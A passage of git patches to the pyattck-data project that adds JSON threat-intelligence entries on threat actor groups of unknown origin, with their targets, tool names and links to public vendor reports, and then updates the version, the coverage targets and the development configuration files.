Southeast Asia, as well as high-tech manufacturing firms and military application technology" + ], + "operations": [], + "description": null, + "tools": [ + "Leouncia" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://twitter.com/bkMSFT/status/1164881831830929411", + "https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Sowbug" + ], + "targets": [ + "South American and Southeast Asian governments" + ], + "operations": [], + "description": null, + "tools": [ + "Felismus" + ], + "links": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ], + "attck_id": null, + "comment": "Tracked by Symantec" + }, + { + "country": "unknown", + "names": [ + "Triton", + "TRISIS" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "?" + ], + "targets": [ + "Winter Olympics in Pyeongchang, South Korea; adversaries looking for information from the games but instead they are aimed to disrupt the games" + ], + "operations": [ + "Olympic Destroyer" + ], + "description": null, + "tools": [ + "Olympic Destroyer (destructive malware)", + "PsExec" + ], + "links": [ + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", + "http://www.intezer.com/2018-winter-cyber-olympics-code-similarities-cyber-attacks-pyeongchang/", + "https://www.recordedfuture.com/olympic-destroyer-malware/", + "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", + "https://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html" + ], + "attck_id": null, + "comment": "Probably Sandworm Team. Highly sophisticated false flag" + }, + { + "country": "unknown", + "names": [ + "Orangeworm" + ], + "targets": [ + "Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage" + ], + "operations": [], + "description": null, + "tools": [ + "Kwampirs backdoor" + ], + "links": [ + "https://www.databreaches.net/team-orangeworm-claims-to-be-dumping-carepartners-data-from-2018-breach/", + "https://www.databreaches.net/team_orangeworm-issues-new-threats-to-carepartners/", + "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://lab52.io/blog/orangeworm-group-kwampirs-analysis-update/", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ], + "attck_id": null, + "comment": "Possibly FIN10 Tracked by Symantec cybercriminal" + }, + { + "country": "unknown", + "names": [ + "FIN10" + ], + "targets": [ + "Casinos and mining (natural resources)" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf" + ], + "attck_id": null, + "comment": "cybercriminal" + }, + { + "country": "unknown", + "names": [ + "Phantom of Routers", + "BlackTech", + "Palmerworm", + "G0098" + ], + "targets": [ + "targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong" + ], + "operations": [ + "Shrouded Crossbow", + "PLEAD", + "Waterbear" + ], + "description": null, + "tools": [ + "BendyBear" + ], + "links": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection/", + "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/", + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html" + ], + "attck_id": null, + "comment": "Probably Chinese actor, \"PLEAD\" and Waterbear labels apply to: (1) actors, (2) malware and (3) operations" + }, + { + "country": "unknown", + "names": [ + "White Company" + ], + "targets": [ + "Pakistani government and military \u00e2\u0080\u0094 in particular, the Pakistani Air Force" + ], + "operations": [ + "Shaheen" + ], + "description": null, + "tools": [], + "links": [ + "https://threatvector.cylance.com/en_us/home/the-white-company-inside-the-operation-shaheen-espionage-campaign.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Silence Group" + ], + "targets": [ + "Targets are located in Eastern Europe and Russia" + ], + "operations": [], + "description": null, + "tools": [ + "Truebot", + "Malicious CHM files" + ], + "links": [ + "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf", + "https://www.group-ib.com/media/silence/", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://www.group-ib.com/media/silence_ta505_attacks_in_europe/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Whitefly" + ], + "targets": [ + "Healthcare, media, telecommunications, and engineering sectors. Singapore" + ], + "operations": [ + "SingHealth" + ], + "description": null, + "tools": [ + "Mimikatz", + "Vcrodat", + "Nibatad", + "CVE-2016-0051", + "Termite" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore" + ], + "attck_id": null, + "comment": "Has been seen targeting organisations based in Singaport and additionally some multinational organizations with a presence in Singapore." + }, + { + "country": "unknown", + "names": [ + "Shaoye", + "Roaming Mantis" + ], + "targets": [ + "Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam" + ], + "operations": [], + "description": null, + "tools": [ + "MITRE: S0509", + "malicious APK" + ], + "links": [ + "https://www.cybereason.com/blog/research/fakespy-masquerades-as-postal-service-apps-around-the-world", + "https://securelist.com/roaming-mantis-part-iv/90332/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/", + "https://securelist.com/roaming-mantis-part-3/88071/", + "https://securelist.com/it-threat-evolution-q2-2019/91994/", + "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", + "https://securelist.com/roaming-mantis-reaches-europe/105596/", + "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/", + "https://securelist.com/roaming-mantis-part-v/96250/" + ], + "attck_id": null, + "comment": "July 2020 Cybereason assessed it is a Chinese TA" + }, + { + "country": "unknown", + "names": [ + "Siamesekitten", + "HEXANE", + "LYCEUM" + ], + "targets": [ + "Middle East, Kuwait, South Africa" + ], + "operations": [], + "description": null, + "tools": [ + "PowerShell", + "Invoke-Obfuscation", + "DanBot", + "PoshC2", + "DanDrop" + ], + "links": [ + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", + "https://dragos.com/resource/hexane/" + ], + "attck_id": null, + "comment": "Most likely Iranian group" + }, + { + "country": "unknown", + "names": [ + "Papa Bear", + "APT-C-37" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://mp.weixin.qq.com/s/lUtXwWjPVMHXfR6oLnXYhQ", + "https://zhuanlan.kanxue.com/article-8168.htm", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Saber Lion", + "APT-C-38", + "ZooPark" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blogs.360.cn/post/analysis-of-APT-C-38.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Storm Cloud" + ], + "targets": [ + "Tibetan Community" + ], + "operations": [], + "description": null, + "tools": [ + "GOSLU", + "PLUGDAT", + "BRAINDAMAGE", + "STITCH" + ], + "links": [ + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" + ], + "attck_id": null, + "comment": "Likely a Chinese group" + }, + { + "country": "unknown", + "names": [ + "Chimera" + ], + "targets": [ + "Taiwan semiconductors" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "MagicScroll", + "AcidBox" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.epicturla.com/blog/acidbox-clustering", + "https://unit42.paloaltonetworks.com/acidbox-rare-malware/", + "https://securelist.com/apt-trends-report-q2-2020/97937/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "FIN12" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "White Tur" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html" + ], + "attck_id": null, + "comment": null + } + ] +} \ No newline at end of file From f707663e19e6d96db2cfc1bd51039902a67ce79a Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 9 Jun 2022 14:56:28 -0500 Subject: [PATCH 3/4] feat: Updating version and codecov percentage --- codecov.yml | 4 ++-- pyproject.toml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/codecov.yml b/codecov.yml index bf5a91b..d4bab38 100644 --- a/codecov.yml +++ b/codecov.yml @@ -3,7 +3,7 @@ coverage: status: project: default: - target: "65" + target: "45" patch: default: - target: "65" + target: "45" diff --git a/pyproject.toml b/pyproject.toml index a1eae06..69e818f 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "pyattck-data" -version = "2.0.1" +version = "2.0.0" description = "Pyattck Data" authors = ["Swimlane "] license = "MIT" From 35906cf0a8aa335467cb4b97909941321b79502a Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 9 Jun 2022 16:05:18 -0500 Subject: [PATCH 4/4] dev: Updating dev dot files! --- .coveragerc | 2 ++ .darglint | 2 ++ .flake8 | 9 +++++++ .gitattributes | 1 + .pre-commit-config.yaml | 58 +++++++++++++++++++++++++++++++++++++++++ .readthedocs.yml | 12 +++++++++ 6 files changed, 84 insertions(+) create mode 100644 .coveragerc create mode 100644 .darglint create mode 100644 .flake8 create mode 100644 .gitattributes create mode 100644 .pre-commit-config.yaml create mode 100644 .readthedocs.yml diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000..ac3e381 --- /dev/null +++ b/.coveragerc @@ -0,0 +1,2 @@ +[report] +fail_under = 45 \ No newline at end of file diff --git a/.darglint b/.darglint new file mode 100644 index 0000000..72ccc6c --- /dev/null +++ b/.darglint @@ -0,0 +1,2 @@ +[darglint] +strictness = long diff --git a/.flake8 b/.flake8 new file mode 100644 index 0000000..a2b5078 --- /dev/null +++ b/.flake8 @@ -0,0 +1,9 @@ +[flake8] +select = B,B9,C,D,DAR,E,F,N,RST,S,W +ignore = E203,E501,RST201,RST203,RST301,W503 +max-line-length = 120 +max-complexity = 10 +docstring-convention = google +per-file-ignores = tests/*:S101 +rst-roles = class,const,func,meth,mod,ref +rst-directives = deprecated diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..6313b56 --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +* text=auto eol=lf diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000..f054639 --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,58 @@ +repos: + - repo: local + hooks: + - id: black + name: black + entry: black + language: system + types: [python] + require_serial: true + - id: check-added-large-files + name: Check for added large files + entry: check-added-large-files + language: system + - id: check-toml + name: Check Toml + entry: check-toml + language: system + types: [toml] + - id: check-yaml + name: Check Yaml + entry: check-yaml + language: system + types: [yaml] + - id: end-of-file-fixer + name: Fix End of Files + entry: end-of-file-fixer + language: system + types: [text] + stages: [commit, push, manual] + - id: flake8 + name: flake8 + entry: flake8 + language: system + types: [python] + require_serial: true + - id: pyupgrade + name: pyupgrade + description: Automatically upgrade syntax for newer versions. + entry: pyupgrade + language: system + types: [python] + args: [--py37-plus] + - id: reorder-python-imports + name: Reorder python imports + entry: reorder-python-imports + language: system + types: [python] + args: [--application-directories=src] + - id: trailing-whitespace + name: Trim Trailing Whitespace + entry: trailing-whitespace-fixer + language: system + types: [text] + stages: [commit, push, manual] + - repo: https://github.com/pre-commit/mirrors-prettier + rev: v2.4.1 + hooks: + - id: prettier diff --git a/.readthedocs.yml b/.readthedocs.yml new file mode 100644 index 0000000..66f2a21 --- /dev/null +++ b/.readthedocs.yml @@ -0,0 +1,12 @@ +version: 2 +build: + os: ubuntu-20.04 + tools: + python: "3.10" +sphinx: + configuration: docs/conf.py +formats: all +python: + install: + - requirements: docs/requirements.txt + - path: .